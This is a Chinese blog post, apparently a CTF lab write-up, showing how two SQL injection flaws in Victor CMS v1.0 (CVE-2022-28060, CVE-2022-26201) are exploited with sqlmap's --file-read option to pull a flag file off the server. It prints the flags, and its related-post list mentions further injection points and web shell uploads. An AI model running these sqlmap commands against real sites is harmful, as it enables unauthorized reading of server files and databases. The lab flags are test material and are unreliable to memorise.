[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

已于 2022-10-30 17:40:50 修改
阅读量2.2k 收藏 6
点赞数 3
分类专栏: CTF 网络安全 文章标签: 安全 web安全 网络安全
于 2022-10-30 17:39:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49199168/article/details/127601863
版权

CVE-2022-28060

 访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来

 python3 sqlmap.py -r 2.txt  --file-read "/flag" --dbms Mysql

时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag 

动下小手来个赞吧~~~

flag{bb728a3c-5fdd-4818-94c3-d2fdc7984561}

CVE-2022-26201

 和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点

  抓包,保存为3.txt,sqlmap跑起来,跟上面一样了

python3 sqlmap.py -r 3.txt --file-read "/flag" --dbms Mysql

时间也是3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag   

 动下小手来个赞吧~~~

flag{30dc0399-c6e1-4d81-82a1-0d35507a50eb}

总结:sql注入类ctf,直接根据--file-read "/flag" --dbms Mysql可以从数据库把flag down下来。

留个关注哦~~~

9917870
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Victor CMS SQL注入漏洞(CVE-2022-28060)
千寻的博客
11-28 1545
Victor CMS v1.0 /includes/login.php 存在sql注入
Victor CMS SQL注入漏洞CVE-2022-26201
千寻的博客
12-01 1833
Victor CMS v1.0 存在二次注入漏洞
[春秋云镜] CVE-2022-28060 详细讲解
weixin_60374959的博客
11-28 2755
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境:CVE-2022-28060
一只爱吃橙子的羊
11-29 2425
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云镜题解-免费空间】,42岁程序员面试
最新发布
2401_84240369的博客
04-11 700
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
CVE-2022-28060 Victor CMS v1.0 /includes/login.php 存在sql注入
qq_38733240的博客
06-03 356
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境:CVE-2022-28060SQL注入
m0_65712192的博客
04-20 781
Victor CMS v1.0 /includes/login.php 存在sql注入
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server权限提升漏洞CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p...
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 6503
春秋云境系列靶场记录合集,不更新了哈……
Victor CMS 未授权sql注入CVE-2020-29280)
00勇士王子的博客
08-08 756
漏洞名称 Victor CMS 未授权sql注入 漏洞等级 高危 爆发时间 2020-11-27 漏洞简介 Victor CMS是一个简单的内容管理系统。 Victor CMS存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 影响版本 The Victor CMS v1.0 漏洞复现 这里用的是云演的在线环境,这个漏洞的环境是免费的 打开漏洞环境,根据漏洞描述,漏洞应该存在于search搜索框 用burp抓搜索框的包,发现是传入的是post参数search 单引号报错 加上注释后页面返回正常
Victor CMS 未授权sql注入(CVE-2020-29280)漏洞复现
锋刃科技的博客
12-19 1430
0X00简介 The Victor CMS v1.0版本存在安全漏洞,该漏洞源于通过search.php页面上的“search”参数造成的。 0X01影响范围 The Victor CMS v1.0 0X02漏洞复现 在search.php中search参数未经过滤就直接和sql语句拼接导致sql注入漏洞 1.访问首页点击搜索框,测试 直接上sqlmap, python.exe .\sqlmap.py -u "http://mode.com/search.php" --data
CTF--CMS漏洞总结
热门推荐
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库。 (1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
【某CMS漏洞分析】SQL注入漏洞分析
bdfcfff77fa的博客
03-07 487
这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值,
CVE-2022-28060
龙狼刺的博客
06-11 283
Victor CMS v1.0 /includes/login.php 存在sql注入

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值